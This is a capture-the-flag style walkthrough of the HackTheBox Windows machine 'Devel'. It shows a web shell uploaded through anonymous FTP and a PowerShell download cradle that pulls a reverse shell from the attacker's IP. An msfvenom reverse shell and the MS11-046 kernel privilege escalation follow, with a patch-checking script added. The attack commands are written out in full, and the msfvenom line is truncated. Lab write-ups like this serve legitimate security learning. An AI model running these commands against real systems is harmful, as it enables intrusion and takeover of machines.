DEVEL (Windows)
Key takeaways:
- FTP anonymous login
- Anonymous write access to an FTP root that is also the IIS web root
- ASPX web shell upload for the foothold
- afd.sys local privilege escalation (MS11-046)
Enumeration
Port scanning using nmap
sudo nmap -sC -sV -Pn -v -oN nmap devel.htb
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Port 21 (FTP) is open and anonymous login is allowed, and the listing already shows content (aspnet_client, iisstart.htm, welcome.png). Let's look into it further.
Logging in to FTP as the anonymous user gives the same listing as above.
The files look like the default IIS website. Since port 80 is open, let's take a look at the website first.
The default IIS page loads welcome.png, the same file that sits on the FTP server. That suggests the FTP root is the web server's document root, i.e. anything we can write over FTP may be reachable over HTTP.
Next, check whether anonymous actually has write access to the FTP directory.
We can try uploading an ASPX file and see whether the web server serves and executes it.
First I copied an ASPX web shell to my devel folder.
NB: I did not use an ASP web shell because I could not run commands with it. Classic ASP is not installed by default on IIS 7 and later, whereas the aspnet_client directory in the listing shows ASP.NET is available, so an ASPX shell is the right choice.
cp /usr/share/webshells/aspx/cmdasp.aspx ~/Desktop/oscp/hackthebox/devel
Then I uploaded it to the FTP server.
Let's try accessing it through the web server at http://devel.htb/cmdasp.aspx.
Running whoami from the web shell, we see we are an IIS APPPOOL account, the application pool identity (a virtual account that lets IIS run an application pool without creating and managing a domain or local account).
Initial Access
Let's get a proper reverse shell.
First, copy the nishang Invoke-PowerShellTcp script:
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
I then appended a call to Invoke-PowerShellTcp (reverse mode, pointing at my IP and listener port) to the end of the script so that it fires as soon as the file is loaded.
From my terminal I served Invoke-PowerShellTcp.ps1 with a Python HTTP server on port 80, the port used in the download cradle below.
Then I started a netcat listener:
nc -nlvp 444
From the web shell I ran the command below and waited for the callback:
cmd /c powershell -c IEX (New-Object Net.WebClient).downloadstring('http://10.10.14.4:80/Invoke-PowerShellTcp.ps1')
The reverse connection came back on port 444.
Running net user shows two local users, babis and Administrator.
I could not access the babis or Administrator profile directories as the application pool identity.
systeminfo shows Windows 7 Enterprise build 7600 (6.1.7600, the RTM release with no service pack) on an x86-based PC.
Privilege Escalation
Searching for that build turns up a public local privilege escalation:
https://www.exploit-db.com/exploits/40564
The exploit abuses afd.sys (the Ancillary Function Driver), a kernel-mode driver that backs Winsock TCP/IP communication. The privilege escalation is possible because AFD improperly validates input passed from user mode to the kernel (MS11-046, CVE-2011-1249). The public exploit targets 32-bit Windows, which matches the x86 system we saw in systeminfo.
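Before uploading a kernel exploit it is worth confirming, from the systeminfo output already in hand, that the build is in the range MS11-046 covers and that the corresponding update (KB2503665) is absent. The Python below is an added example and not part of the original writeup: it parses a constructed systeminfo sample modelled on this box, plus a constructed patched SP1 x64 host for contrast, and returns a verdict. The sample text is mine; the affected-version list and KB number are Microsoft's for MS11-046.

```python
"""Check systeminfo output for MS11-046 (afd.sys) exposure.

Added example, not part of the original writeup. Parses the text that
`systeminfo` prints on the target and decides whether the public afd.sys
exploit is worth uploading.
"""
import re

# KB2503665 is the security update Microsoft shipped for bulletin MS11-046.
MS11_046_KB = "KB2503665"

# Windows versions covered by MS11-046: XP (5.1), Server 2003 (5.2),
# Vista / Server 2008 (6.0), Windows 7 / Server 2008 R2 (6.1).
AFFECTED_NT_VERSIONS = {(5, 1), (5, 2), (6, 0), (6, 1)}

# Constructed sample modelled on what systeminfo shows on Devel (trimmed).
UNPATCHED_SAMPLE = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               x86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 158 Stepping 10 GenuineIntel ~2808 Mhz
Hotfix(s):                 N/A
"""

# Constructed sample of a patched Windows 7 SP1 x64 host for comparison.
PATCHED_SAMPLE = """\
Host Name:                 PATCHED
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2503665
                           [02]: KB2534111
"""


def parse_systeminfo(text):
    """Return the top-level "Key: value" fields plus a 'Hotfixes' list of KB ids."""
    info = {"Hotfixes": []}
    for line in text.splitlines():
        kb = re.match(r"^\s+\[\d+\]:\s*(KB\d+)\s*$", line)   # indented hotfix entries
        if kb:
            info["Hotfixes"].append(kb.group(1).upper())
            continue
        if line and not line[0].isspace() and ":" in line:    # unindented field lines
            key, _, value = line.partition(":")
            info[key.strip()] = value.strip()
    return info


def assess_ms11_046(info):
    """Return (likely_vulnerable, reason) for the afd.sys bug behind MS11-046.

    The kernel bug exists on x86 and x64, but exploit-db 40564 only targets
    x86, so the verdict also names the architecture you are dealing with.
    """
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", info.get("OS Version", ""))
    if not m:
        return False, "could not parse OS Version"
    major, minor, build = (int(x) for x in m.groups())
    arch = "x86" if info.get("System Type", "").startswith("x86") else "x64"
    if (major, minor) not in AFFECTED_NT_VERSIONS:
        return False, f"NT {major}.{minor} build {build} is outside the affected range"
    if MS11_046_KB in info.get("Hotfixes", []):
        return False, f"{MS11_046_KB} is installed"
    return True, f"NT {major}.{minor} build {build} {arch} without {MS11_046_KB}"


if __name__ == "__main__":
    for name, sample in (("devel", UNPATCHED_SAMPLE), ("patched", PATCHED_SAMPLE)):
        vulnerable, reason = assess_ms11_046(parse_systeminfo(sample))
        print(f"{name}: {'likely vulnerable' if vulnerable else 'not vulnerable'} ({reason})")
```

On a real target, paste the full `systeminfo` output into `parse_systeminfo`; a `Hotfix(s): N/A` line, as on this box, means no patch information was reported at all, which is consistent with an unpatched RTM install but is not proof, so the verdict is "likely", not certain.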
Let's compile the C program. The target is 32-bit Windows, so it has to be cross-compiled for x86 (mingw on Kali).
After compiling, I moved the executable to C:\Windows\Temp on the target.
To serve it, I started an impacket SMB server sharing my tools directory:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .
[sudo] password for kali:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Then, from the target shell, I copied the executable off the share with copy:
copy \\10.10.14.4\tools\MS11-046.exe
Running the executable:
I found that the SYSTEM shell it spawned was exiting immediately and I could not escalate from the PowerShell session. Let me swap the PowerShell reverse shell for a standard cmd.exe shell and try again.
For this I generated an msfvenom reverse shell executable (a 32-bit payload, matching the x86 target):
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 EXITFUN
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: rev.exe
Then I copied it to the target over the same SMB share as before.
Running it with a listener on port 4444, I got a standard cmd.exe reverse shell.
Running the exploit once more from that shell, the escalation succeeded.
User.txt
Root.txt
Lessons Learnt
Some exploits spawn a new cmd.exe as the elevated process. Inside the nishang PowerShell reverse shell that child process is not attached to the socket (the script runs each command with Invoke-Expression and ships the output back), so the SYSTEM shell appears to exit immediately. A cmd.exe-based reverse shell such as msfvenom's windows/shell_reverse_tcp has its stdin/stdout bound to the socket and child processes inherit them, so the elevated shell is usable. Either switch to a standard cmd.exe shell before running such an exploit, or use a non-PowerShell reverse shell for the initial access to spare yourself the hassle.